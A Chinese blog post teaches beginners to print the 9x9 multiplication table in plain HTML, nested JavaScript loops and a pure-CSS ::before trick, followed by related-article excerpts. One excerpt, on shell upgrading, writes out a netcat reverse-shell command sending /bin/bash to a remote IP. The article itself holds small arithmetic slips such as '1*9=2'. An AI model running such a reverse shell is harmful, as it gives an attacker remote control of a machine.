单独用HTML javascript CSS 写三版99乘法表,我就是班里最靓的仔

news2025/2/24 11:58:09

 

        ☆  99乘法表,这个从小学就让我们开始产生肌肉记忆的知识点,伴随一生。而一旦开始学习软件开发知识,99乘法表将是一个基础中不可逃避的巩固升级作业。

        ☆  口算背诵相信大家已经滚瓜烂熟了,一一得一,二二得四,六六二十六

             今天本文将从

                HTML 版本 (以布局为铺垫)

                △ javascript 版本 (用一种新鲜的拆解方法写一把)

                △ CSS 版本  (页面只有一个div,完全由css实现,属于另辟蹊径类)

        前端这三大基础中的基础语言入手,逐步实现出各自版本的99乘法表。

目录

一、HTML版本 

二、javascript版本

        1、传统写法

         2、更易理解的写法

        3、目前老师和讲师们的问题

三、最卷得用纯CSS实现99乘法表

        1、说明一下

        2、纯CSS的99乘法表

        3、个人感悟


一、HTML版本 

        HTML版本的实现并没有任何新意,但却是基础的巩固。99乘法表最终会达到9行9列,所以,在不借助CSS javascript的前提下,纯使用HTML语义化标签来实现,所考察的就是如何需要块元素,何时需要行内元素。

        块元素,顾名思义就是一块一块的,2个块级元素放到一起,第二个会排到第二行;而每一行的横向排列,又需要一些最基础的行内元素,以达到向后排列的效果

        除了采用这些块级元素,其实首先应该想到的是table元素,因为99乘法表看上去正适合一个表格的形状模型。今天暂且不用table标签,我们采用正常的元素。

        所谓HTML语义化标签呢,就是希望每个HMLT标签做他该做的事情,在不借助CSS的前提下,也可以有一个很好的展现;而因为语义化标签又是行业标准,所以浏览器和SEO也更希望触碰到简洁而又符合规范的语义化标签;而语义化标签如果得以实现,对于同事间,甲乙方的代码交接也是一个很好的体验。

        话不多说,上代码吧:

<div>
  <span>1 * 1 = 1</span>
</div>
<br/>
<div>
  <span>1 * 2 = 2</span>
  &nbsp;&nbsp;
  <span>2 * 2 = 4</span>
</div>
<br/>
<div>
  <span>1 * 3 = 3</span>
  &nbsp;&nbsp;
  <span>2 * 3 = 6</span>
  &nbsp;&nbsp;
  <span>3 * 3 = 9</span>
</div>
<br/>
<div>
  <span>1 * 4 = 4</span>
  &nbsp;&nbsp;
   <span>2 * 4 = 8</span>
   &nbsp;&nbsp;
   <span>3 * 4 = 12</span>
   &nbsp;&nbsp;
   <span>4 * 4 = 16</span>
</div>
<br/>
<div>......</div>
<br/>
<div>
        <span>1 * 9 = 9</span>
        &nbsp;&nbsp;
        <span>2 * 9= 18</span>
        &nbsp;
        <span>3 * 9 = 27</span>
        &nbsp;&nbsp;
        <span>4 * 9 = 36</span>
        &nbsp;&nbsp;
        <span>5 * 9 = 45</span>
        &nbsp;&nbsp;
        <span>6 * 9 = 54</span>
        &nbsp;&nbsp;
        <span>7 * 9 = 63</span>
        &nbsp;&nbsp;
        <span>8 * 9 = 72</span>
        &nbsp;&nbsp;
        <span>9 * 9 = 81</span>
</div>

 这段代码对于初学者来说需要观察一下,最后一行中,3*9是怎么和上一行的3*4对齐的?因为最后一行的18比上一行的8多占了一个字符的位置

二、javascript版本

        1、传统写法

        其实不要说javascript版本,java c 的99乘法表大家写法都差不多。因为最终的矩阵是9行9列,而且中途会出现2个不断加一的数字,所以必然都是两个循环嵌套,执行9次。

        但我今天不想这么写,历史写法已经N年了。不过为了练练手呢,还是先写一下比较传统的写法:        

<script>
  for (var i=1;i<=9;i++) {
    for (var j=1;j<=i;j++) {
       document.write(j + '*' + i + '=' + j*i + '&nbsp;&nbsp;');
    }
    document.write('<br/>');
   }
</script>

        

        这种写法很简单,短短的6行代码,但对于初学者来说很不友好,而且目前培训班有个特点,今天我就要讲这些课,讲完了留作业,明天就要继续往下讲。而且据我的经验,如果让做99乘法表,应该是学完HTML,学完CSS,然后js基础讲完就要做。意味着自己还一脸懵的时候,就要做更懵逼的事

         2、更易理解的写法

        传统的写法,双层循环,结合99乘法表的结构,第二层循环的执行次数要小于等于第一层循环的,紧接着换行以达到目的。

        并非说上一种不好,第一种很好。因为涉及到双层循环嵌套,初学者不太理解,那么我用拆解法一步步的写出代码。相信哪怕初学者,也会看明白我的思路,因为可以更快的熟悉第一种写法。

<script>
  // for (var i=1;i<=9;i++) {
  //     for (var j=1;j<=i;j++) {
  //         document.write(j + '*' + i + '=' + j*i + '&nbsp;&nbsp;');
  //     }
  //     document.write('<br/>');
  // }
  var num = 1;
  document.write(num + '*' + num + '=' + num*num);
  document.write('<br/>');
  for (var a = 1; a <= 2; a++) { // 这里要执行第二行了,需要执行2次
     document.write(a + '*2' + '=' + a*2 + '&nbsp;&nbsp;');
  }
  document.write('<br/>');
  for (var a = 1; a <= 3; a++) { // 这里要执行第三行了,需要执行3次
     document.write(a + '*3' + '=' + a*3 + '&nbsp;&nbsp;');
  }
  document.write('<br/>');
</script>

        3、目前老师和讲师们的问题

        据我所知,不会有哪个老师在讲解此类问题的时候,可以采用拆解法讲一遍,然后再采用传统写法去练习。大多数上来就是把传统写法往出一甩,大家练习去吧。大家要好好学啊,不好好学找不到工作啊。这只会让同学们更加的忧愁,不会怎么办,是不是我不适合学开发,慢慢开始掉队。

        这里加一个小插曲:慢慢的参加工作后,你会发现这么两种人,需求是让他盖一个房子,有的人能给你搞出鸟巢的感觉来,高大上,但不敢接手;还有一种人,看似普通茅草屋,实则内部应有尽有,容易上手。

三、最卷得用纯CSS实现99乘法表

        1、说明一下

        这里需要说明一下,其实用css写字,或者说写这个乘法表,并非什么高端技术,其实看技术点比较普通,就是通过css的伪类 ::before 往页面元素内添加文字。

        但这绝对属于另辟蹊径类的,或者说一种创新的想法。

        慢慢工作多年,除了公司让做的需求,我们又有哪些东西属于自己了呢。整天想着技术驱动业务,但有多少,还没来得及驱动,业务先没了,接下来你只能去驱动面试题和招聘软件了。

        2、纯CSS的99乘法表

                首先,页面里只有一个div,可以给其设定一些宽高,

                <div class="nienie" style="width: 800px;height: 500px;border:1px solid red;"></div>

                接下来,我们将在这个 nienie 里实现 CSS版的99乘法表。

<style>
  .nienie::before {
     display: block;

     content: '1*1=1 \a 1*2=2 2*2=4 \a 
            1*3=3 2*3=6 3*3=9 \a 1*4=4 2*4=8 
            3*4=12 4*4=16 \a ......  \a 1*9=2 
            2*9=18 3*9=27 4*9=36 5*9=45 
            6*9=54 7*9=63 8*9=72 9*9=81';
            
     white-space: pre;
  }
</style>

        3、个人感悟

         在职场中,常用的快速的解决方案固然重要,但如果你能够掌握多一种解决方案,这可能将是你咸鱼翻身的重要机会。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2700.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【Linux】超好用的编译工具 —— gcc/g++

文章目录 前言 一、安装gcc/g 二、背景知识 三、gcc如何完成 1.预处理&#xff08;进行宏替换&#xff09; 2.编译&#xff08;生成汇编&#xff09; 3.汇编&#xff08;生成机器可识别代码&#xff09; 4.连接&#xff08;生成可执行文件或库文件&#xff09; 5.记忆选项的小技…

Tomcat 实用安装教程

Tomcat的介绍 Tomcat是Apache 软件基金会&#xff08;Apache Software Foundation&#xff09;的Jakarta 项目中的一个核心项目&#xff0c;由Apache、Sun 和其他一些公司及个人共同开发而成。由于有了Sun 的参与和支持&#xff0c;最新的Servlet 和JSP 规范总是能在Tomcat 中得…

【模型训练】YOLOv7道路交通标志检测

YOLOv7道路交通标志检测 1、YOLOv7算法道路交通标志检测模型训练2、YOLOv7模型模型评估3、模型和数据集下载1、本项目采用YOLOv7算法实现对道路交通标志的检测和识别,在道路交通标志检测数据集中训练得到,我们训练了YOLOv7模型,经评估我们得出了各个模型的评价指标; 2、目标…

C · 初阶 | 循环语句

啊我摔倒了..有没有人扶我起来学习.... &#x1f471;个人主页&#xff1a;《CGod的个人主页》\color{Darkorange}{《CGod的个人主页》}《CGod的个人主页》交个朋友叭~ &#x1f492;个人社区&#xff1a;《编程成神技术交流社区》\color{Darkorange}{《编程成神技术交流社区》…

什么是跨域

目录 1 同源策略 2 什么是跨域 3 如何解决跨域 3.1 配置CROS 3.2 Nginx解决跨域问题 1 同源策略 跨域是指浏览器不能执行其他网站的脚本&#xff0c;是由浏览器的同源策略造成的&#xff0c;是浏览器加的安全限制。同源是指&#xff0c;域名&#xff0c;协议&#xff0c;端…

Android | WMS 解析(一)

前言 前段时间分析了 Window 的添加、更新和删除流程&#xff0c;也知晓了 Activity 、Dialog 和 Toast 中 Window 的创建过程&#xff0c;今天就接着上篇文章&#xff0c;看一下 WMS 的创建 以及WindowManager 添加 WIndow 后 WMS 是怎样进行操作的。上篇文章点这里直达&…

Linux下 gdb 调试打印函数局部变量

以下面代码&#xff0c;来说明一下&#xff0c;打印函数局部变量的操作&#xff0c;代码如下&#xff1a; #include <stdio.h>void fun1(void) {int data1 0;printf("data1: %d\n", data1); }void fun2(void) {int data2 1;fun1();printf("***data2: %…

联网智能门锁解锁智慧公租房

近年来&#xff0c;随着物联网技术的发展&#xff0c;愈来愈多的保障房、公租房、网约房、长短租公寓管理者们都在关注如何实现房屋智能管理&#xff0c;面对租户流动性大、管理复杂&#xff0c;房屋空置、闲置、非法转租&#xff0c;以及租户居住体验差等问题&#xff0c;无从…

【万字总结】C++——list的基本使用和模拟实现(建议收藏)

目录 一、list基本介绍 二、list的使用 1、list的初始化方式 2、list的增删查改 push_front和pop_front与push_back和pop_back insert erase 3、list迭代器的使用 正向迭代器 反向迭代器 4、list获取头尾元素 5、list容量操作 6、list的其他操作 sort splice r…

408 | 【2014年】计算机统考真题 自用回顾知识点整理

选择题 T3&#xff1a;循环队列 不同指针指向&#xff0c;队列判空/判满条件 1. rear:指向队尾元素 front:指向队头元素前一个位置 &#xff08;1&#xff09;牺牲一个存储空间 &#xff08;2&#xff09;判空条件&#xff1a;front rear &#xff08;3&#xff…

【C/自定义类型详解】——结构体(struct)、位段、枚举(enum)、联合(union)

关于C语言的知识放在专栏&#xff1a;C 小菜坤日常上传gitee代码&#xff1a;https://gitee.com/qi-dunyan ❤❤❤ 个人简介&#xff1a;双一流非科班的一名小白&#xff0c;期待与各位大佬一起努力&#xff01; 主要目录1、结构体&#xff08;struct&#xff09;1.0 结构体类型…

请问Graph Kernel Fusion(图算融合)在mindspore1.7.0下会生成融合后的mindIR的.dot文件吗

图算融合&#xff0c;GPU (NVIDIA-RTX3080) 验证 【操作步骤&问题现象】 1、参考&#xff08;基于mindspore0.5.0&#xff09;链接1&#xff1a; course: MindSpore实验&#xff0c;仅用于教学或培训目的。配合MindSpore官网使用。MindSpore experiments, for teaching or…

mac 安装部署mongoDB社区版

安装mongo可以采用下载安装包也可以使用Homebrew软件包管理工具安装 我一开始是根据网上走的下载安装包进行的&#xff0c;但总是出现各种问题&#xff0c;最后果断选择跟随官网教程走了 先决条件 如已安装&#xff0c;请跳过 1. 安装 Xcode 命令行工具 Homebrew 需要来自 A…

【Mybatis源码】源码分析

【Mybatis源码】源码分析&#xff08;1&#xff09;Mybatis的基本执行流程&#xff08;1&#xff09;在resources目录下建立一个mybatis-config.xml配置文件&#xff08;2&#xff09;准备UserMapper.xml文件&#xff08;3&#xff09;使用SqlSessionFactoryBuilder.build构建M…

简单的反弹shell到全交互式shell

经常我们拿到的shell是一个简单的shell 如何把一个简单的shell就升级到一个标准交互式shell 写这篇文章记录一下 # kali 起监听 bash # kali默认是zsh 还不兼容,要切换成bash nc -lvvp 9999# 靶机中执行 nc -e /bin/bash 192.168.100.131 9999 python -c import pty; p…

域内批量获取敏感文件

0x01 批量获取域内机器名 自动化工具&#xff0c;当然就要全自动&#xff0c;懒人必备。net group "domain computers" /do &#xff0c;获取机器是3个一排&#xff0c;然后可以通过正则删除空格&#xff0c;每次也麻烦&#xff0c;直接获取机器名更加方便。 思路就…

QT调用OpenCV绘制直线、矩形、椭圆、圆、不规则曲线、文本

开发环境&#xff1a;QT5.14.2OpenCV4.5 提前准备&#xff1a;准备编译好的OpenCV开发环境(如自行编译的mingw版的opencv库&#xff0c;本地路径D:\opencv\qt_build64)&#xff0c;准备一张测试图片&#xff08;如&#xff1a;d:\test.jpg&#xff09;。 项目结构&#xff1a…

如果再来一次,你还会选择互联网么?

现在互联网的就业环境&#xff0c;大家都在感受着一股寒意。也不知道从什么时候开始&#xff0c;身边悲观的声音越来越多了。 如果再给你一次机会&#xff0c;你还会选择互联网吗&#xff1f; 回答这个问题之前&#xff0c;我想跟大家聊聊一个我朋友的故事。 他从学渣到大厂程…

64位下使用回调函数实现监控

前言 在32位的系统下&#xff0c;我们想要实现某些监控十分简单&#xff0c;只需要找到对应的API实现挂钩操作即可检测进程。但在64位系统下随着Patch Guard的引入&#xff0c;导致我们如果继续使用挂钩API的方式进行监控会出现不可控的情况发生。微软也考虑到了用户程序的开发…

Linux shell脚本之笔记及实用笔记

一、前言 二、shell脚本之数据类型 2.1、数组遍历 1)数组定义 如果说变量是存储单个变量的内存空间,那么数组就是多个变量的集合,它存储多个元素在一片连续的内存空间中。在bash中,只支持一维数组,不支持多维数组。Linux Shell 数组用括号来表示,Bash Shell 只支持一维…